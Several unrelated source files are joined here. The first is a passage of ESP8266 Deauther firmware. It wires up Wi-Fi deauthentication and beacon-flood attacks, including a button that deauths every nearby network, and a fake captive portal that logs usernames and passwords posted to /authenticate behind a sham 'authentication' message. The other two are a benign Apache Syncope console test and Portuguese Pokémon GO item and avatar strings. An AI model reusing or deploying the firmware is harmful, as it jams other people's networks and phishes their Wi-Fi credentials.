server.on("/info", loadInfoHTML);
/* JS */
server.on("/js/scan.js", loadScanJS);
server.on("/js/users.js", loadUsersJS);
server.on("/js/attack.js", loadAttackJS);
server.on("/js/detector.js", loadDetectorJS);
server.on("/js/control.js", loadControlJS);
server.on("/js/settings.js", loadSettingsJS);
server.on("/js/info.js", loadInfoJS);
server.on("/js/functions.js", loadFunctionsJS);
/* CSS */
server.on ("/main.css", loadStyle);
server.on ("/dark.css", loadDarkMode);
/* JSON */
// API endpoints used by the pages' scripts.
server.on("/APScanResults.json", sendAPResults);
server.on("/APScan.json", startAPScan);
server.on("/APSelect.json", selectAP);
server.on("/ClientScan.json", startClientScan);
server.on("/ClientScanResults.json", sendClientResults);
server.on("/ClientScanTime.json", sendClientScanTime);
server.on("/clientSelect.json", selectClient);
server.on("/setName.json", setClientName);
server.on("/addClientFromList.json", addClientFromList);
server.on("/attackInfo.json", sendAttackInfo);
server.on("/attackStart.json", startAttack);
server.on("/settings.json", getSettings);
server.on("/sysinfo.json", getSysInfo);
server.on("/settingsSave.json", saveSettings);
server.on("/settingsReset.json", resetSettings);
server.on("/deleteName.json", deleteName);
server.on("/clearNameList.json", clearNameList);
server.on("/editNameList.json", editClientName);
server.on("/addSSID.json", addSSID);
server.on("/cloneSelected.json", cloneSelected);
server.on("/deleteSSID.json", deleteSSID);
server.on("/randomSSID.json", randomSSID);
server.on("/clearSSID.json", clearSSID);
server.on("/resetSSID.json", resetSSID);
server.on("/reloadSSID.json", reloadSSID);
server.on("/saveSSID.json", saveSSID);
server.on("/restartESP.json", restartESP);
server.on("/addClient.json", addClient);
server.on("/enableRandom.json", enableRandom);
server.on("/detectorStart.json", startDetector);
}
#ifdef USE_CAPTIVE_PORTAL
// Captive-portal routes: log credentials posted to /authenticate and serve
// the portal page for every well-known connectivity-check URL.
server.on("/wipwn.log", readCaptiveData);
server.on("/authenticate", []() {
String user = "";
String passwd = "";
if (server.hasArg("user")) {user = server.arg("user");}
if (server.hasArg("passwd")) {passwd = server.arg("passwd");}
if (user.length() > 0 || passwd.length() > 0) {
saveCaptiveData(user, passwd);
server.send(200, "text/html", "Trying wireless authentication for IEEE 802.11 Wi-Fi connection...");
}
// NOTE(review): missing "()" below — this statement has no effect; it
// likely should call loadRedirectHTML(); confirm intended behavior.
else loadRedirectHTML;
});
if (settings.newUser == 0) {
server.on("/wipwn", loadIndexHTML);
server.onNotFound(loadCaptiveHTML);
server.on("/", loadCaptiveHTML);
server.on("/index.html", loadCaptiveHTML);
server.on("/search", loadCaptiveHTML); //Google search captive portal. Maybe not needed. Might be handled by notFound handler.
server.on("/fwlink", loadCaptiveHTML); //Microsoft captive portal. Maybe not needed. Might be handled by notFound handler.
server.on("/success", loadCaptiveHTML); //Firefox captive portal. Maybe not needed. Might be handled by notFound handler.
server.on("/success.txt", loadCaptiveHTML); //Firefox captive portal. Maybe not needed. Might be handled by notFound handler.
server.on("/redirect", loadCaptiveHTML); //Microsoft captive portal. Maybe not needed. Might be handled by notFound handler.
// Captive-portal mode forces the multi-AP option off in EEPROM.
EEPROM.write(multiAPsAdr, false);
settings.multiAPs = (bool)EEPROM.read(multiAPsAdr);
}
#endif
httpUpdater.setup(&server);
server.begin();
#ifdef USE_DISPLAY
// Splash screen and button wiring for the OLED build.
display.init();
display.flipScreenVertically();
pinMode(upBtn, INPUT_PULLUP);
pinMode(downBtn, INPUT_PULLUP);
pinMode(selectBtn, INPUT_PULLUP);
// GPIO0 cannot use the internal pull-up reliably; plain input when used.
if(displayBtn == 0) pinMode(displayBtn, INPUT);
else pinMode(displayBtn, INPUT_PULLUP);
display.clear();
display.setFont(ArialMT_Plain_16);
display.drawString(0, 0, "ESP8266");
display.setFont(ArialMT_Plain_24);
display.drawString(0, 16, "Deauther");
display.setFont(ArialMT_Plain_10);
display.drawString(100, 28, "v");
display.setFont(ArialMT_Plain_16);
display.drawString(104, 24, "1.6");
display.setFont(ArialMT_Plain_10);
display.drawString(0, 40, "Copyright (c) 2017");
display.drawString(0, 50, "Stefan Kremser");
display.display();
display.setFont(Roboto_Mono_8);
delay(1600);
#endif
#ifdef resetPin
// Holding the reset pin low at boot restores factory settings.
pinMode(resetPin, INPUT_PULLUP);
if(digitalRead(resetPin) == LOW) settings.reset();
#endif
if(debug){
Serial.println("\nStarting...\n");
#ifndef USE_DISPLAY
delay(1600);
pinMode(0, INPUT);
#endif
}
}
// Main loop: runs exactly one of three modes — deauth detector, first-run
// setup server, or normal operation (web UI + attacks + optional buttons).
void loop() {
if (detecting) {
// Detector mode: every detectorScanTime ms, drive the alert pin based on
// how many deauth/disassoc frames dSniffer counted, then optionally hop
// to the next channel.
curTime = millis();
if(curTime - prevTime >= settings.detectorScanTime){
prevTime = curTime;
Serial.println((String)dC+" - channel "+(String)curChannel);
if(dC >= 2){
if(settings.invertAlertPin) digitalWrite(settings.alertPin, LOW);
else digitalWrite(settings.alertPin, HIGH);
}else{
if(settings.invertAlertPin) digitalWrite(settings.alertPin, HIGH);
else digitalWrite(settings.alertPin, LOW);
}
dC = 0;
if(settings.detectorAllChannels){
curChannel++;
if(curChannel > 14) curChannel = 1;
wifi_set_channel(curChannel);
}
}
} else if (settings.newUser == 1) {
// First-run mode: only serve the setup pages.
server.handleClient();
} else {
// Normal operation.
if (clientScan.sniffing) {
// While sniffing, wait for the scan to finish before re-enabling the AP.
if (clientScan.stop()) startWifi();
} else {
#ifdef USE_CAPTIVE_PORTAL
dnsServer.processNextRequest();
#endif
server.handleClient();
attack.run();
}
// "reset" typed over serial restores factory settings.
if(Serial.available()){
String input = Serial.readString();
if(input == "reset" || input == "reset\n" || input == "reset\r" || input == "reset\r\n"){
settings.reset();
}
}
#ifndef USE_DISPLAY
#ifdef GPIO0_DEAUTH_BUTTON
// Long-press = triple LED blink + deauth all
// Short-press = LED blink + toggle deauth attack on networks selected
// If no networks are selected, then deauth all
// Make sure the device has been powered on for at least 10 seconds (prevents bootloop issue)
if(digitalRead(0) == LOW && millis() > 10000) {
Serial.println("FLASH button (GPIO0) pressed!");
if(apScan.selectedSum == 0) {
Serial.println("No networks selected... selecting & deauthing all networks");
digitalWrite(settings.ledPin, !settings.pinStateOff);
delay(50);
digitalWrite(settings.ledPin, settings.pinStateOff);
apScan.start();
apScan.select(-1);
attack.start(0);
} else {
// Distinguish a long press (>= 1 s, counted in 100 ms steps) from a
// short press; long press selects and deauths everything.
int button_delay = 0;
while (digitalRead(0) == LOW && millis() > 4000){
button_delay++;
delay(100);
if(button_delay == 10){
Serial.println("Button held down... selecting & deauthing all networks");
digitalWrite(settings.ledPin, settings.pinStateOff);
delay(50);
digitalWrite(settings.ledPin, !settings.pinStateOff);
delay(100);
digitalWrite(settings.ledPin, settings.pinStateOff);
delay(100);
digitalWrite(settings.ledPin, !settings.pinStateOff);
delay(100);
digitalWrite(settings.ledPin, settings.pinStateOff);
delay(100);
digitalWrite(settings.ledPin, !settings.pinStateOff);
delay(100);
digitalWrite(settings.ledPin, settings.pinStateOff);
apScan.start();
apScan.select(-1);
attack.start(0);
break;
}
}
if(button_delay < 10) {
digitalWrite(settings.ledPin, !settings.pinStateOff);
delay(50);
digitalWrite(settings.ledPin, settings.pinStateOff);
Serial.println("Button quickly pressed... toggling deauth attack");
attack.start(0);
}
}
delay(400); // crude debounce before re-reading the button
}
#endif
#endif
#ifdef USE_DISPLAY
// OLED build: poll the four navigation buttons; act on release so a held
// button registers only once (canBtnPress latches the press).
if (digitalRead(upBtn) == LOW || digitalRead(downBtn) == LOW || digitalRead(selectBtn) == LOW || digitalRead(displayBtn) == LOW){
if(canBtnPress){
if(digitalRead(upBtn) == LOW) buttonPressed = 0;
else if(digitalRead(downBtn) == LOW) buttonPressed = 1;
else if(digitalRead(selectBtn) == LOW) buttonPressed = 2;
else if(digitalRead(displayBtn) == LOW) buttonPressed = 3;
canBtnPress = false;
}
}else if(!canBtnPress){
canBtnPress = true;
// ===== UP =====
if (buttonPressed == 0 && curRow > 0) {
curRow--;
if (lrow - 1 < 0) {
lrow = rowsPerSite - 1;
curSite--;
} else lrow--;
// ===== DOWN =====
} else if (buttonPressed == 1 && curRow < rows - 1) {
curRow++;
if (lrow + 1 >= rowsPerSite) {
lrow = 0;
curSite++;
} else lrow++;
// ===== SELECT =====
} else if (buttonPressed == 2) {
// Rows 0-3 are fixed menu entries; rows >= 4 are scanned APs.
// ===== WIFI on/off =====
if (curRow == 0) {
if (wifiMode == "ON") stopWifi();
else startWifi();
// ===== scan for APs =====
} else if (curRow == 1) {
startAPScan();
drawInterface();
// ===== start,stop deauth attack =====
} else if (curRow == 2) {
if (attackMode_deauth == "START" && apScan.getFirstTarget() > -1) attack.start(0);
else if (attackMode_deauth == "STOP") attack.stop(0);
// ===== start,stop beacon attack =====
} else if (curRow == 3) {
if (attackMode_beacon == "START"){
//clone all selected SSIDs
if(apScan.selectedSum > 0){
int clonesPerSSID = 48/apScan.selectedSum;
ssidList.clear();
for(int i=0;i<apScan.results;i++){
if(apScan.isSelected(i)){
ssidList.addClone(apScan.getAPName(i),clonesPerSSID, apScan.getAPEncryption(i) != "none");
}
}
}
attack.ssidChange = true;
//start attack
attack.start(1);
}
else if (attackMode_beacon == "STOP") attack.stop(1);
}
// ===== select APs =====
else if (curRow >= 4) {
attack.stop(0);
apScan.select(curRow - 4);
}
}
// ===== DISPLAY =====
else if (buttonPressed == 3) {
displayOn = !displayOn;
display.clear();
display.display();
}
}
drawInterface();
#endif
}
}
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.syncope.client.console;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertNotNull;
import static org.junit.jupiter.api.Assertions.assertNull;
import static org.junit.jupiter.api.Assertions.assertTrue;
import java.io.IOException;
import java.security.AccessControlException;
import java.util.Enumeration;
import java.util.HashMap;
import java.util.Map;
import java.util.concurrent.ExecutionException;
import javax.ws.rs.BadRequestException;
import org.apache.commons.lang3.StringUtils;
import org.apache.syncope.client.console.pages.Dashboard;
import org.apache.syncope.client.console.pages.Login;
import org.apache.syncope.common.lib.SyncopeClientCompositeException;
import org.apache.syncope.common.lib.SyncopeClientException;
import org.apache.syncope.common.lib.types.ClientExceptionType;
import org.apache.wicket.feedback.FeedbackMessage;
import org.apache.wicket.util.tester.FormTester;
import org.junit.jupiter.api.Test;
public class SyncopeConsoleApplicationTest extends AbstractTest {
/**
 * Collects all {@code security.headers.*} entries from the test configuration
 * into a map keyed by the bare header name (prefix stripped).
 */
private Map<String, String> getConfiguredSecurityHeaders() throws IOException {
    final String prefix = "security.headers.";
    Map<String, String> headers = new HashMap<>();
    @SuppressWarnings("unchecked")
    Enumeration<String> names = (Enumeration<String>) PROPS.propertyNames();
    while (names.hasMoreElements()) {
        String prop = names.nextElement();
        if (prop.startsWith(prefix)) {
            headers.put(StringUtils.substringAfter(prop, prefix), PROPS.getProperty(prop));
        }
    }
    return headers;
}
@Test
public void securityHeaders() throws IOException {
    Map<String, String> expected = getConfiguredSecurityHeaders();
    assertEquals(4, expected.size());
    // 1. anonymous access: headers must be present on the login page
    TESTER.startPage(Login.class);
    TESTER.assertRenderedPage(Login.class);
    for (Map.Entry<String, String> header : expected.entrySet()) {
        assertEquals(header.getValue(), TESTER.getLastResponse().getHeader(header.getKey()));
    }
    // 2. authenticated access: headers must survive the login round-trip
    FormTester form = TESTER.newFormTester("login");
    form.setValue("username", "username");
    form.setValue("password", "password");
    form.submit("submit");
    TESTER.assertRenderedPage(Dashboard.class);
    for (Map.Entry<String, String> header : expected.entrySet()) {
        assertEquals(header.getValue(), TESTER.getLastResponse().getHeader(header.getKey()));
    }
}
@Test
public void errors() {
SyncopeConsoleSession session = SyncopeConsoleSession.get();
assertNull(session.getFeedbackMessages().first());
session.onException(new AccessControlException("JWT Expired"));
FeedbackMessage message = session.getFeedbackMessages().first();
assertNotNull(message);
assertTrue(message.isError());
assertEquals(SyncopeConsoleSession.Error.SESSION_EXPIRED.fallback(), message.getMessage());
session.getFeedbackMessages().clear();
session.onException(new AccessControlException("Auth Exception"));
message = session.getFeedbackMessages().first();
assertNotNull(message);
assertTrue(message.isError());
assertEquals(SyncopeConsoleSession.Error.AUTHORIZATION.fallback(), message.getMessage());
session.getFeedbackMessages().clear();
session.onException(new BadRequestException());
message = session.getFeedbackMessages().first();
assertNotNull(message);
assertTrue(message.isError());
assertEquals(SyncopeConsoleSession.Error.REST.fallback(), message.getMessage());
session.getFeedbackMessages().clear();
SyncopeClientException sce = SyncopeClientException.build(ClientExceptionType.InvalidUser);
sce.getElements().add("Error 1");
session.onException(sce);
message = session.getFeedbackMessages().first();
assertNotNull(message);
assertTrue(message.isError());
assertEquals("Error 1", message.getMessage());
session.getFeedbackMessages().clear();
sce = SyncopeClientException.build(ClientExceptionType.InvalidUser);
sce.getElements().add("Error 1");
sce.getElements().add("Error 2");
session.onException(sce);
message = session.getFeedbackMessages().first();
assertNotNull(message);
assertTrue(message.isError());
assertEquals("Error 1, Error 2", message.getMessage());
session.getFeedbackMessages().clear();
SyncopeClientCompositeException scce = SyncopeClientException.buildComposite();
scce.addException(SyncopeClientException.build(ClientExceptionType.InvalidUser));
scce.addException(SyncopeClientException.build(ClientExceptionType.InvalidExternalResource));
session.onException(new ExecutionException(scce));
message = session.getFeedbackMessages().first();
assertNotNull(message);
assertTrue(message.isError());
assertEquals(scce.getMessage(), message.getMessage());
session.getFeedbackMessages().clear();
}
}
| {
"pile_set_name": "Github"
} |
item_great_ball_desc
Poké Bola de alto rendimento. Tem um índice de êxito superior ao da Poké Bola padrão.
item_great_ball_name
Grande Bola
item_hyper_potion_desc
Remédio em spray que cura machucados e que restaura os PS de um Pokémon em {1} pontos.
item_hyper_potion_name
Hiperpoção
item_master_ball_desc
A Poké Bola com melhor desempenho. Pega qualquer Pokémon selvagem sem falha.
item_master_ball_name
Bola Mestra
item_max_potion_desc
Remédio em spray que cura machucados e que restaura todos os PS de um Pokémon.
item_max_potion_name
Poção Máxima
item_revive_desc
Remédio para reanimar Pokémon desmaiados e que também restaura metade de seus PS.
item_revive_name
Reviver
item_max_revive_desc
Remédio para reanimar Pokémon desmaiados e que também restaura todos os seus PS.
item_max_revive_name
Máximo Reviver
item_poke_ball_desc
Um dispositivo para pegar Pokémon selvagens, que é jogado como uma bola os encapsulando.
item_poke_ball_name
Poké Bola
item_potion_desc
Remédio em spray que cura machucados e que restaura os PS de um Pokémon em {1} pontos.
item_potion_name
Poção
item_razz_berry_desc
Dê esta Fruta a um Pokémon para pegá-lo com mais facilidade.
item_razz_berry_name
Fruta Frambo
item_special_camera_name
Câmera
item_special_camera_desc
Você poderá usar a sua câmera para fotografar Pokémon selvagens quando os encontrar.
item_super_potion_desc
Remédio em spray que cura machucados e que restaura os PS de um Pokémon em {1} pontos.
item_super_potion_name
Superpoção
item_ultra_ball_desc
Poké Bola com desempenho superior. Tem um índice de êxito superior ao da Grande Bola.
item_ultra_ball_name
Ultra Bola
item_x_attack_desc
INDEFINIDO
item_x_attack_name
Ataque X
item_x_defense_desc
INDEFINIDO
item_x_defense_name
Defesa X
item_x_miracle_desc
INDEFINIDO
item_x_miracle_name
INDEFINIDO
item_bluk_berry_desc
INDEFINIDO
item_bluk_berry_name
Fruta Roama
item_wepar_berry_desc
INDEFINIDO
item_wepar_berry_name
Fruta Ocipêra
item_nanab_berry_desc
Dê esta fruta a um Pokémon para acalmá-lo e torná-lo menos imprevisível.
item_nanab_berry_name
Fruta Anaba
item_pinap_berry_desc
Dê esta fruta a um Pokémon para receber mais doces ao pegá-lo.
item_pinap_berry_name
Fruta Caxí
item_pokemon_bag_name
Upgrade da caixa de Pokémon
item_pokemon_bag_desc
Aumenta o tamanho da sua coleção de Pokémon.
item_item_pack_name
Combo de itens
item_item_pack_desc
Aumenta o tamanho da sua Bolsa.
pokeball.20_title
20 Poké Bolas
pokeball.20_description
20 Poké Bolas para pegar Pokémon selvagens!
pokeball.100_title
100 Poké Bolas
pokeball.100_description
100 Poké Bolas para pegar Pokémon selvagens!
pokeball.200_title
200 Poké Bolas
pokeball.200_description
200 Poké Bolas para pegar Pokémon selvagens!
pokemonstorageupgrade.1_title
Upgrade do estoque de Pokémon
pokemonstorageupgrade.1_description
Aumenta o estoque de Pokémon em {0}.
itemstorageupgrade.1_title
Upgrade da Bolsa
itemstorageupgrade.1_description
Aumenta o estoque de itens em {0}.
item_lucky_egg_name
Ovo da Sorte
item_lucky_egg_desc
Um ovo cheio de felicidade e que faz você ganhar o dobro de PE por 30 minutos.
luckyegg.1_title
Ovo da Sorte
luckyegg.1_description
Um Ovo cheio de felicidade que faz você ganhar o dobro de PE por 30 minutos.
luckyegg.5_title
5 Ovos da Sorte
luckyegg.5_description
5 Ovos cheios de felicidade que fazem você ganhar o dobro de PE por 30 minutos.
luckyegg.8_title
8 Ovos da Sorte
luckyegg.8_description
8 Ovos cheios de felicidade que fazem você ganhar o dobro de PE por 30 minutos.
luckyegg.25_title
25 Ovos da Sorte
luckyegg.25_description
25 Ovos cheios de felicidade que fazem você ganhar o dobro de PE por 30 minutos.
item_incense_ordinary_name
Incenso
item_incense_ordinary_desc
Incenso de fragrância misteriosa que atrai Pokémon selvagens até você por 30 minutos.
incenseordinary.1_title
Incenso
incenseordinary.1_description
Incenso de fragrância misteriosa que atrai Pokémon selvagens até você por 30 minutos.
incenseordinary.8_title
8 Incensos
incenseordinary.8_description
8 Incensos. A fragrância misteriosa atrai Pokémon selvagens até você por 30 minutos.
incenseordinary.25_title
25 Incensos
incenseordinary.25_description
25 Incensos. A fragrância misteriosa atrai Pokémon selvagens até você por 30 minutos.
incubatorbasic.1_title
Incubadora de Ovo
incubatorbasic.1_description
Dispositivo de incubação que ajuda a chocar um Ovo conforme você anda. Pode ser usado 3 vezes.
item_incubator_basic_name
Incubadora de Ovo
item_incubator_basic_desc
Dispositivo de incubação que ajuda a chocar um Ovo conforme você anda. Pode ser usado 3 vezes.
item_incubator_basic_unlimited_name
Incubadora de Ovo ∞
item_incubator_basic_unlimited_desc
Dispositivo de incubação que choca um Ovo após uma certa distância caminhada. Uso ilimitado!
pokecoin.1000_title
1.000 Pokémoedas apenas para teste
pokecoin.1000_description
pokecoin.100_title
100 Pokémoedas
pokecoin.100_description
pokecoin.550_title
550 Pokémoedas
pokecoin.550_description
pokecoin.1200_title
1.200 Pokémoedas
pokecoin.1200_description
pokecoin.2500_title
2.500 Pokémoedas
pokecoin.2500_description
pokecoin.5200_title
5.200 Pokémoedas
pokecoin.5200_description
pokecoin.14500_title
14.500 Pokémoedas
pokecoin.14500_description
item_troy_disk_name
Módulo Atrair
item_troy_disk_desc
Atrai Pokémon a uma Poképarada por 30 minutos. Pode beneficiar outras pessoas por perto.
troydisk.1_title
Módulo Atrair
troydisk.1_description
Atrai Pokémon a uma Poképarada por 30 minutos. Pode beneficiar outras pessoas por perto.
troydisk.8_title
8 Módulos Atrair
troydisk.8_description
Atrai Pokémon a uma Poképarada por 30 minutos. Pode beneficiar outras pessoas por perto.
item_sun_stone_name
Pedra Solar
item_sun_stone_desc
Pedra peculiar que faz com que certas espécies de Pokémon evoluam. É vermelha como o sol ao entardecer.
item_kings_rock_name
Pedra do Rei
item_kings_rock_desc
Pedra que faz com que certas espécies de Pokémon evoluam. Lembra uma coroa.
item_metal_coat_name
Revestimento Metálico
item_metal_coat_desc
Revestimento que faz com que certas espécies de Pokémon evoluam. É uma película de metal especial.
item_dragon_scale_name
Escama de Dragão
item_dragon_scale_desc
Escama que faz com que certas espécies de Pokémon evoluam. É robusta e resistente.
item_up_grade_name
Melhora
item_up_grade_desc
Dispositivo transparente que faz com que certas espécies de Pokémon evoluam. Produzido pela Silph Co.
avatar_f_backpack_cute_bundle_icon
Mochila com laço
avatar_f_backpack_default_bundle_icon
Mochila urbana
avatar_f_backpack_empty_bundle_icon
Sem bolsa
avatar_f_belt_simple_bundle_icon
Fivela plana
avatar_f_belt_default_bundle_icon
Fivela de Poké Bola
avatar_f_belt_empty_bundle_icon
Sem cinto
avatar_f_glasses_mask_bundle_icon
Máscara misteriosa
avatar_f_glasses_3d_bundle_icon
Óculos 3D
avatar_f_glasses_thick_bundle_icon
Óculos para ler
avatar_f_glasses_empty_bundle_icon
Sem óculos
avatar_f_gloves_default_bundle_icon
Luvas sem dedos
avatar_f_gloves_empty_bundle_icon
Sem luvas
avatar_f_hat_knitted_bundle_icon
Gorro de lã
avatar_f_hat_fedora_bundle_icon
Chapéu com aba
avatar_f_hat_tophat_bundle_icon
Cartola
avatar_f_hat_casket_bundle_icon
Boina
avatar_f_hat_default_a_bundle_icon
Chapéu de Poké Bola
avatar_f_hat_default_b_bundle_icon
Chapéu esportivo
avatar_f_hat_empty_bundle_icon
Sem chapéu
avatar_f_necklace_heart_bundle_icon
Gargantilha com coração
avatar_f_necklace_star_bundle_icon
Gargantilha com estrela
avatar_f_necklace_default_bundle_icon
Gargantilha de fita
avatar_f_necklace_empty_bundle_icon
Sem colar
avatar_f_pants_neon_bundle_icon
Calça legging
avatar_f_pants_skinnyjeans_bundle_icon
Calça colada
avatar_f_pants_shorts_bundle_icon
Short curto
avatar_f_pants_miniskirt_wave_bundle_icon
Saia ondulada
avatar_f_pants_miniskirt_bundle_icon
Saia listrada
avatar_f_pants_miniskirt_turbine_bundle_icon
Saia godê
avatar_f_pants_default_bundle_icon
Body de corrida
avatar_f_shirt_tshirt_pikachu_bundle_icon
Blusa de Pikachu
avatar_f_shirt_tanktop_pikachu_bundle_icon
Camiseta de Pikachu
avatar_f_shirt_tanktop_charizard_bundle_icon
Camiseta de Charizard
avatar_f_shirt_sweater_valor_bundle_icon
Gola alta da Equipe Valor
avatar_f_shirt_sweater_mystic_bundle_icon
Gola alta da Equipe Sabedoria
avatar_f_shirt_sweater_instinct_bundle_icon
Gola alta da Equipe Instinto
avatar_f_shirt_sweater_30_bundle_icon
Gola alta trinta
avatar_f_shirt_tshirt_cycling_bundle_icon
Blusa esportiva
avatar_f_shirt_buttondown_bundle_icon
Camisa de botão colada
avatar_f_shirt_tanktop_bundle_icon
Camiseta de Treinador
avatar_f_shirt_default_bundle_icon
Manga longa clássica
avatar_f_shoes_default_bundle_icon
Tênis de correr
avatar_f_shoes_empty_bundle_icon
Sem calçados
avatar_f_socks_thighhighs_bundle_icon
Polainas de lã
avatar_f_socks_default_bundle_icon
Polainas longas
avatar_f_socks_empty_bundle_icon
Sem meias
avatar_m_backpack_default_bundle_icon
Mochila de Treinador
avatar_m_backpack_empty_bundle_icon
Sem bolsa
avatar_m_glasses_mask_bundle_icon
Máscara misteriosa
avatar_m_glasses_3d_bundle_icon
Óculos 3D
avatar_m_glasses_thick_bundle_icon
Óculos para ler
avatar_m_glasses_empty_bundle_icon
Sem óculos
avatar_m_gloves_default_bundle_icon
Luvas sem dedos
avatar_m_gloves_empty_bundle_icon
Sem luvas
avatar_m_hat_fedora_bundle_icon
Chapéu com aba
avatar_m_hat_tophat_bundle_icon
Cartola
avatar_m_hat_casket_bundle_icon
Boina
avatar_m_hat_default_bundle_icon
Viseira de Treinador
avatar_m_hat_empty_bundle_icon
Sem chapéu
avatar_m_pants_sweats_bundle_icon
Calça de treino esportiva
avatar_m_pants_skinnyjeans_bundle_icon
Calça justa
avatar_m_pants_default_bundle_icon
Calção esportivo
avatar_m_shirt_blazer_bundle_icon
Blazer
avatar_m_shirt_longsleeves_charizard_bundle_icon
Pulôver de Charizard
avatar_m_shirt_longsleeves_pikachu_bundle_icon
Pulôver de Pikachu
avatar_m_shirt_tshirt_instinct_bundle_icon
Camisa da Equipe Instinto
avatar_m_shirt_tshirt_mystic_bundle_icon
Camisa da Equipe Sabedoria
avatar_m_shirt_tshirt_valor_bundle_icon
Camisa da Equipe Valor
avatar_m_shirt_turtleneck_30_bundle_icon
Gola alta trinta
avatar_m_shirt_tshirt_geometric_bundle_icon
Camisa diagonal
avatar_m_shirt_sweatshirt_sporty_bundle_icon
Moletom esportivo
avatar_m_shirt_sweatshirt_streak_bundle_icon
Moletom faixa
avatar_m_shirt_default_2_bundle_icon
Moletom clássico
avatar_m_shirt_default_1_bundle_icon
Moletom coluna
avatar_m_shirt_default_0_bundle_icon
Moletom banda
avatar_m_shirt_default_3_bundle_icon
Moletom ponta
avatar_m_shoes_default_bundle_icon
Tênis de correr
avatar_m_shoes_empty_bundle_icon
Sem calçados
avatar_m_socks_default_bundle_icon
Meia-calça
avatar_m_socks_empty_bundle_icon
Sem meias
avatar_m_hat_magikarp_bundle_icon
Chapéu de Magikarp
avatar_f_hat_magikarp_bundle_icon
Chapéu de Magikarp
avatar_m_hat_adventure_bundle_icon
Chapéu de expedição
avatar_f_hat_adventure_bundle_icon
Chapéu de expedição
paidraidticket.1_title
Passe de Reide Premium
paidraidticket.1_description
Um Passe de Reide que pode ser usado para participar de um Reide.
maxrevive.6_title
6 Máximo Reviver
maxrevive.6_description
6 Máximo Reviver que podem reviver um Pokémon desmaiado e restaurar todos os seus PS.
oneyearanniversary.1_title
Caixa de Aniversário
maxpotion.10_title
10 Poções Máximas
maxpotion.10_description
10 Poções Máximas que restauram todos os PS de 10 Pokémon.
f_shirt_tshirt_fest_chicago_2017_bundle_icon
Camiseta do Festival de <i>Pokémon GO</i>
m_shirt_tshirt_fest_chicago_2017_bundle_icon
Camiseta do Festival de <i>Pokémon GO</i>
bundle.general1.small.1_title
Combo Especial
bundle.general1.medium.1_title
Combo Supergenial
bundle.general1.large.1_title
Combo Ultraespecial
avatar_m_hat_mimikyu_icon
Chapéu disfarce de Mimikyu
avatar_f_hat_mimikyu_icon
Chapéu disfarce de Mimikyu
f_hat_ultra_bundle_icon
Chapéu de Ultra Moon
f_shirt_ultra_bundle_icon
Blusa de Ultra Moon
f_backpack_ultra_bundle_icon
Mochila de Ultra Moon
f_pants_ultra_bundle_icon
Short de Ultra Moon
f_shoes_ultra_bundle_icon
Sandálias de Ultra Moon
m_hat_ultra_bundle_icon
Chapéu de Ultra Sun
m_shirt_ultra_bundle_icon
Regata de Ultra Sun
m_backpack_ultra_bundle_icon
Mochila de Ultra Sun
m_pants_ultra_bundle_icon
Bermuda de Ultra Sun
m_shoes_ultra_bundle_icon
Tênis de Ultra Sun
item_star_piece_name
Pedaço de Estrela
item_star_piece_desc
Um pequeno caco de uma linda joia que faz você ganhar 50% a mais de Poeira Estelar por 30 minutos.
starpiece.1_description
Um pequeno caco de uma linda joia que faz você ganhar 50% a mais de Poeira Estelar por 30 minutos.
starpiece.8_description
8 Pedaços de Estrela que fazem você ganhar 50% a mais de Poeira Estelar por 30 minutos.
starpiece.25_description
25 Pedaços de Estrela que fazem você ganhar 50% a mais de Poeira Estelar por 30 minutos.
starpiece.1_title
Pedaço de Estrela
starpiece.8_title
8 Pedaços de Estrela
starpiece.25_title
25 Pedaços de Estrela
bundle.general2.small.1_title
Combo de Inverno
bundle.general3.small.1_title
Combo de Inverno
bundle.general2.medium.1_title
Combo Supergenial
bundle.general3.medium.1_title
Combo Supergenial
bundle.general2.large.1_title
Combo Ultraespecial
bundle.general3.large.1_title
Combo Ultraespecial
m_shoes_fisher_bundle_icon
Bota de pescador
m_hat_jogger_bundle_icon
Viseira de corredor
m_glasses_jogger_bundle_icon
Óculos escuros de corredor
m_shirt_jogger_bundle_icon
Top de corredor
m_pants_jogger_bundle_icon
Bermuda de corredor
m_shoes_jogger_bundle_icon
Tênis de corredor
m_gloves_jogger_bundle_icon
Relógio de corredor
f_shirt_battlegirl_bundle_icon
Top de lutadora
f_gloves_battlegirl_bundle_icon
Luvas de lutadora
f_pants_battlegirl_bundle_icon
Shorts de lutadora
f_shoes_battlegirl_bundle_icon
Tênis de lutadora
avatar_f_pants_battlegirl_bundle_icon
Shorts de lutadora
avatar_f_shoes_battlegirl_bundle_icon
Tênis de lutadora
avatar_m_gloves_jogger_bundle_icon
Relógio de corredor
avatar_m_pants_jogger_bundle_icon
Bermuda de corredor
avatar_f_gloves_battlegirl_bundle_icon
Luvas de lutadora
avatar_f_shirt_battlegirl_bundle_icon
Top de lutadora
avatar_m_shirt_jogger_bundle_icon
Top de corredor
avatar_m_shoes_jogger_bundle_icon
Tênis de corredor
avatar_m_glasses_jogger_bundle_icon
Óculos escuros de corredor
avatar_m_shoes_fisher_bundle_icon
Bota de pescador
avatar_m_hat_jogger_bundle_icon
Viseira de corredor
avatar_m_pants_fisher_bundle_icon
Calça de pescador
avatar_m_shirt_fisher_bundle_icon
Veste de pescador
avatar_m_hat_fisher_bundle_icon
Boné de pescador
avatar_f_hat_teamrocket_bundle_icon
Chapéu da Equipe Rocket
avatar_f_shirt_teamrocket_0_bundle_icon
Blusa da Equipe Rocket
avatar_f_shirt_teamrocket_1_bundle_icon
Blusa da Equipe Rainbow Rocket
avatar_f_gloves_teamrocket_bundle_icon
Luvas da Equipe Rocket
avatar_f_belt_teamrocket_1_bundle_icon
Cinto da Equipe Rainbow Rocket
avatar_f_pants_teamrocket_bundle_icon
Saia da Equipe Rocket
avatar_f_shoes_teamrocket_0_bundle_icon
Botas da Equipe Rocket
avatar_f_shoes_teamrocket_1_bundle_icon
Botas da Equipe Rainbow Rocket
avatar_m_hat_teamrocket_bundle_icon
Chapéu da Equipe Rocket
